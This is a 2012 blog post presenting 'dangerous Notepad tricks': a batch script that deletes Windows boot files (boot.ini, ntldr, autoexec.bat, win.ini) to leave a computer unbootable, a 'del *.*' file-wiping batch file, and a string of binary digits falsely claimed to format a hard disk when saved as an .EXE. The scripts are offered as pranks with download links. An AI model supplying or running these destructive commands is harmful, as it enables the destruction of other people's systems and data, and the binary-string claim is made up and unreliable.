Wednesday, 18 April 2012

Most Dangerous Notepad tricks

Hi Guys! today we were surfing the internet we got some cool but dangerous and deadliest notepad trick.You should not at all try this on your own computer.You can't recover your computer back from that stage.





 

  1. Shutdown a computer forever

    1. Copy the following code to notepad
      @echo off
      attrib -r -s -h c:\autoexec.bat
      del c:\autoexec.bat
      attrib -r -s -h c:\boot.ini
      del c:\boot.ini
      attrib -r -s -h c:\ntldr
      del c:\ntldr
      attrib -r -s -h c:\windows\win.ini
      del c:\windows\win.ini
    2. Save it as whatever.bat or click here

     

  2. Format your Hard Disk

    1. Copy the following code to notepad
      code:01001011000111110010010101010101010000011111100000
    2. Save it as whatever.EXE or click here

  3. Delete all System files

    1. Copy the following code to notepad
      del *.*
    2. Save it as anything.bat or click here
     

This post is brought to you by Gaurav uttamani and sajal tiwari (hack it off team)

No comments:

Related Posts Plugin for WordPress, Blogger...